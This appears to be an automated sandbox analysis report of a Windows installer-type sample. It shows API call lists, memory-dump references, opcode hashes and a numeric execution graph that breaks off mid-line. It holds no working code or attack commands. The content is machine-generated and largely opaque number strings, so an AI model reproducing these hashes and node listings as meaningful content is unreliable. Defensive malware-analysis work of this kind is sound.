                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                              • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                              • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                              • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                              APIs
                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                              • String ID: HideWindow
                                              • API String ID: 1249568736-780306582
                                              • Opcode ID: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                              • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                              • Opcode Fuzzy Hash: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
                                              • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: PrivateProfileStringlstrcmp
                                              • String ID: !N~
                                              • API String ID: 623250636-529124213
                                              • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                              • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                              • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                              • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                              Strings
                                              • Error launching installer, xrefs: 00405C74
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                              • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                              • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                              • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                              APIs
                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: CloseHandlelstrlenwvsprintf
                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                              • API String ID: 3509786178-2769509956
                                              • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                              • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                              • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                              • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                              • Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                              Execution Graph

                                              Execution Coverage:4.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:1.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:32
                                              execution_graph 97971 31066 97976 3aaaa 97971->97976 97973 3106c 98009 52f70 97973->98009 97977 3aacb 97976->97977 98012 502eb 97977->98012 97981 3ab12 98022 41207 97981->98022 97984 41207 59 API calls 97985 3ab26 97984->97985 97986 41207 59 API calls 97985->97986 97987 3ab30 97986->97987 97988 41207 59 API calls 97987->97988 97989 3ab6e 97988->97989 97990 41207 59 API calls 97989->97990 97991 3ac39 97990->97991 98027 50588 97991->98027 97995 3ac6b 97996 41207 59 API calls 97995->97996 97997 3ac75 97996->97997 98055 4fe2b 97997->98055 97999 3acbc 98000 3accc GetStdHandle 97999->98000 98001 3ad18 98000->98001 98002 72f39 98000->98002 98003 3ad20 OleInitialize 98001->98003 98002->98001 98004 72f42 98002->98004 98003->97973 98062 970f3 64 API calls Mailbox 98004->98062 98006 72f49 98063 977c2 CreateThread 98006->98063 98008 72f55 CloseHandle 98008->98003 98141 52e74 98009->98141 98011 31076 98064 503c4 98012->98064 98015 503c4 59 API calls 98016 5032d 98015->98016 98017 41207 59 API calls 98016->98017 98018 50339 98017->98018 98071 41821 98018->98071 98020 3aad1 98021 507bb 6 API calls 98020->98021 98021->97981 98023 50fe6 Mailbox 59 API calls 98022->98023 98024 41228 98023->98024 98025 50fe6 Mailbox 59 API calls 98024->98025 98026 3ab1c 98025->98026 98026->97984 98028 41207 59 API calls 98027->98028 98029 50598 98028->98029 98030 41207 59 API calls 98029->98030 98031 505a0 98030->98031 98136 410c3 98031->98136 98034 410c3 59 API calls 98035 505b0 98034->98035 98036 41207 59 API calls 98035->98036 98037 505bb 98036->98037 98038 50fe6 Mailbox 59 API calls 98037->98038 98039 3ac43 98038->98039 98040 4ff4c 98039->98040 98041 4ff5a 98040->98041 98042 41207 59 API calls 98041->98042 98043 4ff65 98042->98043 98044 41207 59 API calls 98043->98044 98045 4ff70 98044->98045 98046 41207 59 API calls 98045->98046 98047 4ff7b 98046->98047 98048 41207 59 API calls 98047->98048 98049 4ff86 98048->98049 98050 410c3 59 API calls 98049->98050 98051 4ff91 98050->98051 98052 50fe6 Mailbox 59 API calls 98051->98052 98053 4ff98 RegisterWindowMessageW 98052->98053 98053->97995 98056 8620c 98055->98056 98057 4fe3b 98055->98057 98139 9a12a 59 API calls 98056->98139 98058 50fe6 Mailbox 59 API calls 98057->98058 98061 4fe43 98058->98061 98060 86217 98061->97999 98062->98006 98063->98008 98140 977a8 65 API calls 98063->98140 98065 41207 59 API calls 98064->98065 98066 503cf 98065->98066 98067 41207 59 API calls 98066->98067 98068 503d7 98067->98068 98069 41207 59 API calls 98068->98069 98070 50323 98069->98070 98070->98015 98072 4182d __NMSG_WRITE 98071->98072 98073 4189a 98071->98073 98075 41843 98072->98075 98076 41868 98072->98076 98084 41981 98073->98084 98080 41b7c 59 API calls Mailbox 98075->98080 98081 41c7e 98076->98081 98079 4184b _memmove 98079->98020 98080->98079 98088 50fe6 98081->98088 98083 41c88 98083->98079 98085 4198f 98084->98085 98087 41998 _memmove 98084->98087 98085->98087 98132 41aa4 98085->98132 98087->98079 98090 50fee 98088->98090 98091 51008 98090->98091 98093 5100c std::exception::exception 98090->98093 98098 5593c 98090->98098 98115 535d1 DecodePointer 98090->98115 98091->98083 98116 587cb RaiseException 98093->98116 98095 51036 98117 58701 58 API calls _free 98095->98117 98097 51048 98097->98083 98099 559b7 98098->98099 98110 55948 98098->98110 98126 535d1 DecodePointer 98099->98126 98101 559bd 98127 58d58 58 API calls __getptd_noexit 98101->98127 98104 5597b RtlAllocateHeap 98104->98110 98114 559af 98104->98114 98106 559a3 98124 58d58 58 API calls __getptd_noexit 98106->98124 98110->98104 98110->98106 98111 559a1 98110->98111 98112 55953 98110->98112 98123 535d1 DecodePointer 98110->98123 98125 58d58 58 API calls __getptd_noexit 98111->98125 98112->98110 98118 5a39b 58 API calls 2 library calls 98112->98118 98119 5a3f8 58 API calls 6 library calls 98112->98119 98120 532cf 98112->98120 98114->98090 98115->98090 98116->98095 98117->98097 98118->98112 98119->98112 98128 5329b GetModuleHandleExW 98120->98128 98123->98110 98124->98111 98125->98114 98126->98101 98127->98114 98129 532b4 GetProcAddress 98128->98129 98130 532cb ExitProcess 98128->98130 98129->98130 98131 532c6 98129->98131 98131->98130 98133 41ab7 98132->98133 98135 41ab4 _memmove 98132->98135 98134 50fe6 Mailbox 59 API calls 98133->98134 98134->98135 98135->98087 98137 41207 59 API calls 98136->98137 98138 410cb 98137->98138 98138->98034 98139->98060 98142 52e80 _flsall 98141->98142 98149 53447 98142->98149 98148 52ea7 _flsall 98148->98011 98166 59e3b 98149->98166 98151 52e89 98152 52eb8 DecodePointer DecodePointer 98151->98152 98153 52ee5 98152->98153 98154 52e95 98152->98154 98153->98154 98211 589d4 59 API calls __woutput_l 98153->98211 98163 52eb2 98154->98163 98156 52f48 EncodePointer EncodePointer 98156->98154 98157 52ef7 98157->98156 98158 52f1c 98157->98158 98212 58a94 61 API calls 2 library calls 98157->98212 98158->98154 98161 52f36 EncodePointer 98158->98161 98213 58a94 61 API calls 2 library calls 98158->98213 98161->98156 98162 52f30 98162->98154 98162->98161 98214 53450 98163->98214 98167 59e4c 98166->98167 98168 59e5f EnterCriticalSection 98166->98168 98173 59ec3 98167->98173 98168->98151 98170 59e52 98170->98168 98197 532e5 58 API calls 3 library calls 98170->98197 98174 59ecf _flsall 98173->98174 98175 59ef0 98174->98175 98176 59ed8 98174->98176 98184 59f11 _flsall 98175->98184 98200 58a4d 58 API calls __malloc_crt 98175->98200 98198 5a39b 58 API calls 2 library calls 98176->98198 98178 59edd 98199 5a3f8 58 API calls 6 library calls 98178->98199 98180 59f05 98182 59f0c 98180->98182 98183 59f1b 98180->98183 98201 58d58 58 API calls __getptd_noexit 98182->98201 98187 59e3b __lock 58 API calls 98183->98187 98184->98170 98185 59ee4 98188 532cf _fast_error_exit 3 API calls 98185->98188 98189 59f22 98187->98189 98190 59eee 98188->98190 98191 59f47 98189->98191 98192 59f2f 98189->98192 98190->98175 98203 52f85 98191->98203 98202 5a05b InitializeCriticalSectionAndSpinCount 98192->98202 98195 59f3b 98209 59f63 LeaveCriticalSection _doexit 98195->98209 98198->98178 98199->98185 98200->98180 98201->98184 98202->98195 98204 52f8e RtlFreeHeap 98203->98204 98208 52fb7 _free 98203->98208 98205 52fa3 98204->98205 98204->98208 98210 58d58 58 API calls __getptd_noexit 98205->98210 98207 52fa9 GetLastError 98207->98208 98208->98195 98209->98184 98210->98207 98211->98157 98212->98158 98213->98162 98217 59fa5 LeaveCriticalSection 98214->98217 98216 52eb7 98216->98148 98217->98216 98218 6e463 98230 3373a 98218->98230 98220 6e479 98221 6e48f 98220->98221 98222 6e4fa 98220->98222 98281 35376 60 API calls 98221->98281 98239 3b020 98222->98239 98224 6e4ce 98229 6e4ee Mailbox 98224->98229 98282 9890a 59 API calls Mailbox 98224->98282 98227 6f046 Mailbox 98229->98227 98283 9a48d 89 API calls 4 library calls 98229->98283 98231 33746 98230->98231 98232 33758 98230->98232 98284 3523c 98231->98284 98234 33787 98232->98234 98235 3375e 98232->98235 98236 3523c 59 API calls 98234->98236 98237 50fe6 Mailbox 59 API calls 98235->98237 98238 33750 98236->98238 98237->98238 98238->98220 98296 43740 98239->98296 98242 730b6 98404 9a48d 89 API calls 4 library calls 98242->98404 98243 3b07f 98243->98242 98245 730d4 98243->98245 98256 3b132 Mailbox _memmove 98243->98256 98275 3bb86 98243->98275 98405 9a48d 89 API calls 4 library calls 98245->98405 98247 7355e 98280 3b4dd 98247->98280 98463 9a48d 89 API calls 4 library calls 98247->98463 98248 73106 98249 7318a 98248->98249 98406 3a9de 295 API calls 98248->98406 98249->98280 98407 9a48d 89 API calls 4 library calls 98249->98407 98251 8730a 59 API calls 98251->98256 98256->98247 98256->98248 98256->98251 98258 353b0 295 API calls 98256->98258 98259 33b31 59 API calls 98256->98259 98262 73418 98256->98262 98268 731c3 98256->98268 98270 7346f 98256->98270 98274 50fe6 59 API calls Mailbox 98256->98274 98256->98275 98276 3523c 59 API calls 98256->98276 98277 41c9c 59 API calls 98256->98277 98279 33c30 68 API calls 98256->98279 98256->98280 98301 33add 98256->98301 98308 3bc70 98256->98308 98387 33a40 98256->98387 98398 35190 98256->98398 98409 86c62 59 API calls 2 library calls 98256->98409 98410 aa9c3 85 API calls Mailbox 98256->98410 98411 86c1e 59 API calls Mailbox 98256->98411 98412 95ef2 68 API calls 98256->98412 98413 33ea3 98256->98413 98462 9a12a 59 API calls 98256->98462 98258->98256 98259->98256 98429 353b0 98262->98429 98265 73448 98265->98280 98457 339be 98265->98457 98408 9a48d 89 API calls 4 library calls 98268->98408 98461 9a48d 89 API calls 4 library calls 98270->98461 98274->98256 98403 9a48d 89 API calls 4 library calls 98275->98403 98276->98256 98277->98256 98279->98256 98280->98229 98281->98224 98282->98229 98283->98227 98285 3524a 98284->98285 98287 35250 98284->98287 98285->98287 98288 41c9c 98285->98288 98287->98238 98289 41ca7 98288->98289 98290 41caf 98288->98290 98292 41bcc 98289->98292 98290->98287 98294 41bdc 98292->98294 98295 41bef _memmove 98292->98295 98293 50fe6 Mailbox 59 API calls 98293->98295 98294->98293 98294->98295 98295->98290 98297 4374f 98296->98297 98300 4376a 98296->98300 98298 41aa4 59 API calls 98297->98298 98299 43757 CharUpperBuffW 98298->98299 98299->98300 98300->98243 98302 6d3cd 98301->98302 98303 33aee 98301->98303 98304 50fe6 Mailbox 59 API calls 98303->98304 98305 33af5 98304->98305 98306 33b16 98305->98306 98464 33ba5 59 API calls Mailbox 98305->98464 98306->98256 98309 7359f 98308->98309 98319 3bc95 98308->98319 98612 9a48d 89 API calls 4 library calls 98309->98612 98311 3bf3b 98311->98256 98318 3c2ca LockWindowUpdate DestroyWindow GetMessageW 98318->98311 98320 3c2fc 98318->98320 98381 3bca5 Mailbox 98319->98381 98613 35376 60 API calls 98319->98613 98614 8700c 295 API calls 98319->98614 98321 74509 TranslateMessage DispatchMessageW GetMessageW 98320->98321 98321->98311 98321->98321 98322 736b3 Sleep 98322->98381 98323 35376 60 API calls 98323->98381 98324 50fe6 59 API calls Mailbox 98324->98381 98325 3bf54 timeGetTime 98325->98381 98327 7405d WaitForSingleObject 98331 7407d GetExitCodeProcess CloseHandle 98327->98331 98327->98381 98328 41c9c 59 API calls 98328->98381 98329 41207 59 API calls 98360 7389e Mailbox 98329->98360 98330 3c210 Sleep 98330->98381 98338 3c36b 98331->98338 98333 743a9 Sleep 98333->98360 98336 3c324 timeGetTime 98611 35376 60 API calls 98336->98611 98338->98256 98342 74440 GetExitCodeProcess 98347 74456 WaitForSingleObject 98342->98347 98348 7446c CloseHandle 98342->98348 98343 b6562 110 API calls 98343->98360 98345 36d79 109 API calls 98345->98381 98347->98348 98347->98381 98348->98360 98349 738aa Sleep 98349->98381 98350 744c8 Sleep 98350->98381 98353 41a36 59 API calls 98353->98360 98356 33ea3 68 API calls 98356->98360 98357 353b0 273 API calls 98357->98381 98359 3c26d 98607 41a36 98359->98607 98360->98329 98360->98338 98360->98342 98360->98343 98360->98349 98360->98350 98360->98353 98360->98356 98360->98381 98638 92baf 60 API calls 98360->98638 98639 35376 60 API calls 98360->98639 98640 36cd8 295 API calls 98360->98640 98682 50859 timeGetTime 98360->98682 98683 94148 CreateToolhelp32Snapshot Process32FirstW 98360->98683 98361 3b020 273 API calls 98361->98381 98364 41a36 59 API calls 98364->98381 98366 3bf25 Mailbox 98366->98311 98577 3c460 98366->98577 98369 35190 59 API calls Mailbox 98369->98381 98370 36cd8 273 API calls 98370->98381 98371 33a40 59 API calls 98371->98381 98372 339be 68 API calls 98372->98381 98373 9a48d 89 API calls 98373->98381 98374 33ea3 68 API calls 98374->98381 98375 73e13 VariantClear 98375->98381 98376 86cf1 59 API calls Mailbox 98376->98381 98377 73ea9 VariantClear 98377->98381 98378 341c4 59 API calls Mailbox 98378->98381 98379 87aad 59 API calls 98379->98381 98380 73c57 VariantClear 98380->98381 98381->98322 98381->98323 98381->98324 98381->98325 98381->98327 98381->98328 98381->98330 98381->98333 98381->98336 98381->98338 98381->98345 98381->98357 98381->98359 98381->98360 98381->98361 98381->98364 98381->98366 98381->98369 98381->98370 98381->98371 98381->98372 98381->98373 98381->98374 98381->98375 98381->98376 98381->98377 98381->98378 98381->98379 98381->98380 98465 352b0 98381->98465 98474 39a00 98381->98474 98481 39c80 98381->98481 98512 3a820 98381->98512 98529 af01c 98381->98529 98551 ae60c 98381->98551 98554 9c270 98381->98554 98561 b64b2 98381->98561 98568 3e36d 98381->98568 98596 957ff 98381->98596 98606 50859 timeGetTime 98381->98606 98615 b6655 59 API calls 98381->98615 98616 9a058 59 API calls Mailbox 98381->98616 98617 8e0aa 59 API calls 98381->98617 98618 34d37 98381->98618 98636 86c62 59 API calls 2 library calls 98381->98636 98637 338ff 59 API calls 98381->98637 98641 ac355 98381->98641 98681 870e2 59 API calls 98381->98681 98388 33a53 98387->98388 98389 6d3b1 98387->98389 98391 33a9a Mailbox 98388->98391 98393 33a7d 98388->98393 98394 33b31 59 API calls 98388->98394 98390 6d3c1 98389->98390 99115 86d17 59 API calls 98389->99115 98391->98256 98395 33a83 98393->98395 99107 33b31 98393->99107 98394->98393 98395->98391 98397 35190 Mailbox 59 API calls 98395->98397 98397->98391 98400 3519b 98398->98400 98399 351d2 98399->98256 98400->98399 99116 341c4 59 API calls Mailbox 98400->99116 98402 351fd 98402->98256 98403->98242 98404->98280 98405->98280 98406->98249 98407->98280 98408->98280 98409->98256 98410->98256 98411->98256 98412->98256 99117 33c30 98413->99117 98415 33eb3 98416 33f2d 98415->98416 98417 33ebd 98415->98417 98419 3523c 59 API calls 98416->98419 98418 50fe6 Mailbox 59 API calls 98417->98418 98420 33ece 98418->98420 98428 33f1d 98419->98428 98421 41207 59 API calls 98420->98421 98422 33edc 98420->98422 98421->98422 98423 33eeb 98422->98423 98424 41bcc 59 API calls 98422->98424 98425 50fe6 Mailbox 59 API calls 98423->98425 98424->98423 98426 33ef5 98425->98426 99124 33bc8 68 API calls 98426->99124 98428->98256 98430 353cf 98429->98430 98452 353fd Mailbox 98429->98452 98431 50fe6 Mailbox 59 API calls 98430->98431 98431->98452 98432 52f70 67 API calls __cinit 98432->98452 98433 369fa 98434 41c9c 59 API calls 98433->98434 98445 35569 Mailbox 98434->98445 98435 369ff 98437 6f165 98435->98437 98438 6e691 98435->98438 98436 50fe6 59 API calls Mailbox 98436->98452 99147 9a48d 89 API calls 4 library calls 98437->99147 99143 9a48d 89 API calls 4 library calls 98438->99143 98442 41c9c 59 API calls 98442->98452 98443 6e6a0 98443->98265 98444 35a1a 99146 9a48d 89 API calls 4 library calls 98444->99146 98445->98265 98446 6ea9a 98448 41c9c 59 API calls 98446->98448 98448->98445 98449 41207 59 API calls 98449->98452 98451 87aad 59 API calls 98451->98452 98452->98432 98452->98433 98452->98435 98452->98436 98452->98438 98452->98442 98452->98444 98452->98445 98452->98446 98452->98449 98452->98451 98453 6eb67 98452->98453 98455 6ef28 98452->98455 99125 36e30 98452->99125 99142 37e50 295 API calls 2 library calls 98452->99142 98453->98445 99144 87aad 59 API calls 98453->99144 99145 9a48d 89 API calls 4 library calls 98455->99145 98458 339c9 98457->98458 98459 339f0 98458->98459 98460 33ea3 68 API calls 98458->98460 98459->98270 98460->98459 98461->98280 98462->98256 98463->98280 98464->98306 98466 352c6 98465->98466 98467 35313 98465->98467 98466->98467 98468 352d3 PeekMessageW 98466->98468 98469 352ec 98467->98469 98471 6df68 TranslateAcceleratorW 98467->98471 98472 35352 TranslateMessage DispatchMessageW 98467->98472 98473 3533e PeekMessageW 98467->98473 98693 3359e 98467->98693 98468->98467 98468->98469 98469->98381 98471->98467 98471->98473 98472->98473 98473->98467 98473->98469 98475 39a31 98474->98475 98476 39a1d 98474->98476 98732 9a48d 89 API calls 4 library calls 98475->98732 98698 394e0 98476->98698 98478 39a28 98478->98381 98480 72478 98480->98480 98482 39cb5 98481->98482 98483 7247d 98482->98483 98486 39d1f 98482->98486 98490 39d79 98482->98490 98484 353b0 295 API calls 98483->98484 98485 72492 98484->98485 98510 39f50 Mailbox 98485->98510 98748 9a48d 89 API calls 4 library calls 98485->98748 98489 41207 59 API calls 98486->98489 98486->98490 98487 41207 59 API calls 98487->98490 98491 724d8 98489->98491 98490->98487 98492 52f70 __cinit 67 API calls 98490->98492 98494 724fa 98490->98494 98499 39f3a 98490->98499 98490->98510 98493 52f70 __cinit 67 API calls 98491->98493 98492->98490 98493->98490 98494->98381 98495 9a48d 89 API calls 98495->98510 98496 339be 68 API calls 98496->98510 98498 353b0 295 API calls 98498->98510 98499->98510 98749 9a48d 89 API calls 4 library calls 98499->98749 98500 34230 59 API calls 98500->98510 98502 3a775 98753 9a48d 89 API calls 4 library calls 98502->98753 98504 35190 Mailbox 59 API calls 98504->98510 98505 727f9 98505->98381 98508 41bcc 59 API calls 98508->98510 98510->98495 98510->98496 98510->98498 98510->98500 98510->98502 98510->98504 98510->98508 98511 3a058 98510->98511 98750 87aad 59 API calls 98510->98750 98751 accac 295 API calls 98510->98751 98752 abc26 295 API calls Mailbox 98510->98752 98754 a9ab0 295 API calls Mailbox 98510->98754 98511->98381 98513 72d51 98512->98513 98516 3a84c 98512->98516 98756 9a48d 89 API calls 4 library calls 98513->98756 98515 72d62 98515->98381 98517 72d6a 98516->98517 98524 3a888 _memmove 98516->98524 98757 9a48d 89 API calls 4 library calls 98517->98757 98520 50fe6 59 API calls Mailbox 98520->98524 98521 72dae 98758 3a9de 295 API calls 98521->98758 98522 353b0 295 API calls 98522->98524 98524->98520 98524->98521 98524->98522 98525 72dc8 98524->98525 98526 3a975 98524->98526 98527 3a962 98524->98527 98525->98526 98759 9a48d 89 API calls 4 library calls 98525->98759 98526->98381 98527->98526 98755 aa9c3 85 API calls Mailbox 98527->98755 98530 34d37 84 API calls 98529->98530 98531 